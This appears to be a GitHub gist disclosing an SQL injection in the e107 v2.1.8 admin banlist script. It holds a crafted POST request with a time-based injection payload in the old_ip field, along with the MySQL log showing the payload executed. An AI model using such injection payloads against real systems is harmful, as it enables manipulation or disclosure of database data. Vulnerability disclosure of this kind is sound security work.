Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
e107 v2.1.8 Banlist SQL Injection


e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.


  1. Login to the admin page. (/e107_admin/admin.php)
  2. Send a POST request to /e107_admin/banlist.php and use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryREEvpmFYBJa0wazD
Cookie: my_cookie=***********************
Content-Length: 464

Content-Disposition: form-data; name="entry_intent"

Content-Disposition: form-data; name="update_ban"

Content-Disposition: form-data; name="ban_ip"

Content-Disposition: form-data; name="old_ip"

'; SELECT SLEEP(10) --'
  1. It takes 10 seconds or more for the response to come back.

This means that an SQL query SELECT SLEEP(10) set to old_ip was executed on the server.
This is mysql's query log.

2018-07-31T01:44:07.412204Z	   27 Query	UPDATE e107_banlist SET `banlist_ip`='dummy', `banlist_admin`='1', `banlist_reason`='', `banlist_notes`='' WHERE banlist_ip='';
2018-07-31T01:44:07.412445Z	   27 Query	SELECT SLEEP(10) --''

Source Code

The cause of the vulnerability is in this line. $_POST['old_ip'] is concatenated without properly escaping.



Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment